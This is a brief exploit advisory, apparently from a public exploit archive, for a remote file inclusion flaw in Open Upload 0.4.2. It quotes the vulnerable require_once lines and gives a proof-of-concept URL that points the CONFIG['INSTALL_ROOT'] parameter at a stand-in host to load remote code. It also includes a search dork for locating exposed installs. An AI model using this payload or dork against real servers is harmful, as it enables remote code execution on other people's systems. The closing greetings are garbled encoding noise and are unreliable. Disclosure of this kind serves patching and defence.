Open Upload 0.4.2 Remote File Inclusion
Posted on 29 December 2017
======================================================================== | # Title : Openupload 0.4.2 RFI vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 10 FranASSais V.(Pro) | # Version : 0.4.2 | # Vendor : http://wmscripti.com/ | # Dork : open upload - login ======================================================================== poc : www/index.php line 61,62 require_once($configfile); require_once($CONFIG['INSTALL_ROOT'].'/lib/general.inc.php'); 127.0.0.1/open/www/index.php?CONFIG['INSTALL_ROOT']= ev!l Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------ | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz | | ===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================
